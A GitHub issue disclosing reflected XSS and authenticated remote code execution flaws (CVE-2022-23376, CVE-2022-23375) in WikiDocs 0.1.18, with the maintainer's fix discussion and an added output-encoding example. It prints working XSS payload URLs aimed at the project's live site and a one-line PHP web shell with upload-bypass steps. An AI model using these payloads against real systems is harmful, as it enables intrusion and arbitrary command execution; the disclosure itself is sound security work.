Multiple Vulnerabilities in WikiDocs 0.1.18 #28

Closed
nam3lum opened this issue Feb 19, 2022 · 8 comments

nam3lum commented Feb 19, 2022

CVE-2022-23376 / Multiple reflected XSS vulnerabilities on different pages.

1. (Template.inc.php) - Reflected XSS Injection

First vulnerability in line 47:
image
Second is in line 210:
image
XSS directly using url: https://www.wikidocs.it/?search=%3Csvg/onload=%27alert(%22XSS%22);%27%3E

2. (Submit.php) - Reflected XSS Injection

Vulnerability in line 31:
image
XSS directly using url: https://www.wikidocs.it/submit.php?act=%22});%3C/script%3E%3Csvg/onload=%27alert(%22XSS%22);%27%3E

3. (Index.php) - Reflected XSS Injection:

image

CVE-2022-23375 / Authenticated remote code execution vulnerability

(Index.php) - Image upload, Authenticated Remote Code Execution:

First, log in to the website and click the edit button at the top right:
image
Before the upload process, we have to create a malicious payload image:
image
name: shell.php.png
payload:

<?php echo system($_REQUEST['cmd']); ?>

After that, you have to click the image button at the top and upload the image:
image
Select the malicious file and click upload:
image
In the upload process, change the file extension to PHP in the POST request:
image
Then the browser automatically sends another request to the malicious file:
image
Just browse it and try to execute some commands:
image

Information Disclosure Vulnerability (I did not reserve CVE for this one)

(Functions.inc.php) - Debug mode can be enabled:

Vulnerable lines are between 15-18:
image
You can get sensitive information using debug mode:
image

I hope you will close these vulnerabilities ASAP.
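
Added example, not part of the original report and not WikiDocs code: context-aware output encoding for the two reflected parameters named above, run against the decoded query values from the report's URLs. The helper names (`html_out`, `js_out`, `action_param`), the `handleAction` call and the output templates are assumptions, since the vulnerable lines survive here only as screenshots.

```php
<?php
// Added example, not WikiDocs code; helper names are hypothetical.

// HTML text or attribute context, e.g. echoing `search` back into the page.
function html_out(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Inline <script> context, e.g. passing `act` to a JavaScript call.
// json_encode() emits a complete quoted JS string literal; the JSON_HEX_*
// flags write <, >, &, ' and " as \uXXXX, so "</script>" cannot close the block.
function js_out(string $value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_INVALID_UTF8_SUBSTITUTE | JSON_THROW_ON_ERROR;
    return json_encode($value, $flags);
}

// Parameters that only select an action are matched against an allowlist.
function action_param(?string $value, array $allowed, string $default): string
{
    return in_array($value, $allowed, true) ? $value : $default;
}

// The two query values from the report, decoded as PHP would receive them.
$search = rawurldecode('%3Csvg/onload=%27alert(%22XSS%22);%27%3E');
$act    = rawurldecode('%22});%3C/script%3E%3Csvg/onload=%27alert(%22XSS%22);%27%3E');

// Constructed output templates; the real WikiDocs markup is not shown on the page.
echo '<input name="search" value="' . html_out($search) . '">' . PHP_EOL;
echo '<script>handleAction({act: ' . js_out($act) . '});</script>' . PHP_EOL;
echo 'act=' . action_param($act, ['edit', 'delete'], 'none') . PHP_EOL;
```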

Zavy86 commented Feb 21, 2022

Hi @nam3lum, thanks for the reports. I will provide as soon as possible...

@Zavy86 Zavy86 added the bug Something isn't working label Feb 21, 2022
@Zavy86 Zavy86 added this to the Release 1.0.0 milestone Feb 21, 2022

Zavy86 commented Feb 21, 2022

In version 0.1.20 I tried to fix the shell bug. Can you check if you can still hack it?

nam3lum commented Feb 22, 2022

Actually, your application is more secure right now because it does not accept any extension 😃
image

Zavy86 commented Feb 22, 2022

OK, can you try now please? :) v0.1.21

Zavy86 commented Feb 22, 2022

Parameter to enable and disable debug mode for the Information Disclosure Vulnerability. v0.2.1

@Zavy86 Zavy86 removed this from the Release 1.0.0 milestone Feb 22, 2022
@Zavy86 Zavy86 self-assigned this Feb 22, 2022
@Zavy86 Zavy86 pinned this issue Feb 22, 2022
@Zavy86 Zavy86 removed their assignment Sep 19, 2022
@Zavy86 Zavy86 added this to the Release 1.0.0 milestone May 4, 2023
@Zavy86 Zavy86 self-assigned this May 4, 2023

Zavy86 commented May 4, 2023

fixed in refactored, release version up to 0.5.0

@Zavy86 Zavy86 closed this as completed May 4, 2023
@Zavy86 Zavy86 unpinned this issue May 4, 2023

Zavy86 commented May 10, 2023

@nam3lum
